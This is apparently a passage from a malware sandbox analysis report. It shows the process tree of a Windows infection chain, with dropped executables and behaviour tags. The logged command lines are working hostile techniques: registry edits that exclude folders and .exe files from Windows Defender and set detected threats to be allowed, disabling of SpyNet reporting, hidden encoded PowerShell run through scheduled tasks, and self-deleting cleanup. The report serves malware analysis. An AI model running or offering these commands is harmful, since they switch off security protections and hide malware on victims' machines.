                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im 66nV1z8js65ISs1L9XAA7pXA.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\66nV1z8js65ISs1L9XAA7pXA.exe" & del C:\ProgramData\*.dll & exit
                                                                                    7⤵
                                                                                      PID:528
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        taskkill /im 66nV1z8js65ISs1L9XAA7pXA.exe /f
                                                                                        8⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:1220
                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                        timeout /t 6
                                                                                        8⤵
                                                                                        • Delays execution with timeout.exe
                                                                                        PID:4164
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\nya4MoApdsb2XT0CxMjuIAlG.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\nya4MoApdsb2XT0CxMjuIAlG.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    PID:4188
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\CskJwf4WFOYXOSk0hsT5Ruh3.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\CskJwf4WFOYXOSk0hsT5Ruh3.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4672
                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSB1A5.tmp\Install.exe
                                                                                      .\Install.exe
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:1292
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC52D.tmp\Install.exe
                                                                                        .\Install.exe /S /site_id "525403"
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks BIOS information in registry
                                                                                        • Drops file in System32 directory
                                                                                        • Enumerates system info in registry
                                                                                        PID:2544
                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                          9⤵
                                                                                            PID:4684
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                              10⤵
                                                                                                PID:1548
                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                  11⤵
                                                                                                    PID:4000
                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                                    11⤵
                                                                                                      PID:4196
                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                                  9⤵
                                                                                                    PID:1900
                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      10⤵
                                                                                                        PID:4944
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                                        10⤵
                                                                                                          PID:5068
                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                            11⤵
                                                                                                              PID:4524
                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                              11⤵
                                                                                                                PID:4732
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /CREATE /TN "gvzVdyFrN" /SC once /ST 11:09:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                            9⤵
                                                                                                            • Creates scheduled task(s)
                                                                                                            PID:5068
                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              10⤵
                                                                                                                PID:1548
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /run /I /tn "gvzVdyFrN"
                                                                                                              9⤵
                                                                                                                PID:2640
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /DELETE /F /TN "gvzVdyFrN"
                                                                                                                9⤵
                                                                                                                  PID:3684
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 19:21:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\sgBeeeV.exe\" j6 /site_id 525403 /S" /V1 /F
                                                                                                                  9⤵
                                                                                                                  • Creates scheduled task(s)
                                                                                                                  PID:2284
                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\bDabzgYLnm8OxLkHozGO_bHf.exe
                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\bDabzgYLnm8OxLkHozGO_bHf.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4800
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 604
                                                                                                              7⤵
                                                                                                              • Program crash
                                                                                                              PID:4320
                                                                                                            • C:\Windows\syswow64\rundll32.exe
                                                                                                              "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                                                                                              7⤵
                                                                                                                PID:3468
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 580
                                                                                                                7⤵
                                                                                                                • Program crash
                                                                                                                PID:1636
                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\r3_WbgzGMgRR4ERiLJgsjWnh.exe
                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\r3_WbgzGMgRR4ERiLJgsjWnh.exe"
                                                                                                              6⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:672
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c timeout 37
                                                                                                                7⤵
                                                                                                                  PID:1220
                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                    timeout 37
                                                                                                                    8⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:2232
                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                  7⤵
                                                                                                                    PID:4992
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c Tue02976fcdf1.exe
                                                                                                              4⤵
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:440
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS8A81FA9D\Tue02976fcdf1.exe
                                                                                                                Tue02976fcdf1.exe
                                                                                                                5⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:832
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c Tue028a363eda.exe
                                                                                                              4⤵
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:448
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS8A81FA9D\Tue028a363eda.exe
                                                                                                                Tue028a363eda.exe
                                                                                                                5⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:316
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c Tue02522f9ea0b1.exe
                                                                                                              4⤵
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:3896
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS8A81FA9D\Tue02522f9ea0b1.exe
                                                                                                                Tue02522f9ea0b1.exe
                                                                                                                5⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Checks SCSI registry key(s)
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                PID:3716
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 492
                                                                                                              4⤵
                                                                                                              • Program crash
                                                                                                              PID:2368
                                                                                                      • C:\Users\Admin\AppData\Roaming\rsijhjr
                                                                                                        C:\Users\Admin\AppData\Roaming\rsijhjr
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks SCSI registry key(s)
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:2508
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                        1⤵
                                                                                                          PID:1268
                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:1036
                                                                                                          • C:\Windows\system32\gpupdate.exe
                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                            2⤵
                                                                                                              PID:4788
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\sgBeeeV.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\sgBeeeV.exe j6 /site_id 525403 /S
                                                                                                            1⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Drops file in System32 directory
                                                                                                            PID:1620
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                                                                                                              2⤵
                                                                                                              • Drops file in System32 directory
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              PID:4232
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                3⤵
                                                                                                                  PID:2216
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                    4⤵
                                                                                                                      PID:5076
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:2708
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                    3⤵
                                                                                                                      PID:4628
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                      3⤵
                                                                                                                        PID:1644
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                        3⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:4896
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                        3⤵
                                                                                                                          PID:5004
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                          3⤵
                                                                                                                            PID:3360
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                            3⤵
                                                                                                                              PID:224
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:4620
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                3⤵
                                                                                                                                  PID:3604
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                  3⤵
                                                                                                                                    PID:4740
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                    3⤵
                                                                                                                                      PID:4464
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                      3⤵
                                                                                                                                        PID:4536
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:4136
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                        3⤵
                                                                                                                                          PID:1452
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                          3⤵
                                                                                                                                            PID:1232
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                            3⤵
                                                                                                                                              PID:1392
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                              3⤵
                                                                                                                                                PID:4488
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                3⤵
                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                PID:2284
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:2372
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                  3⤵
                                                                                                                                                    PID:4588
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:4144
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                      3⤵
                                                                                                                                                        PID:5044
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                        3⤵
                                                                                                                                                          PID:2272
                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                        2⤵
                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                        PID:3564
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                          3⤵
                                                                                                                                                            PID:1360
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                              4⤵
                                                                                                                                                                PID:4764
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                              3⤵
                                                                                                                                                                PID:4624
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:4576
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:64
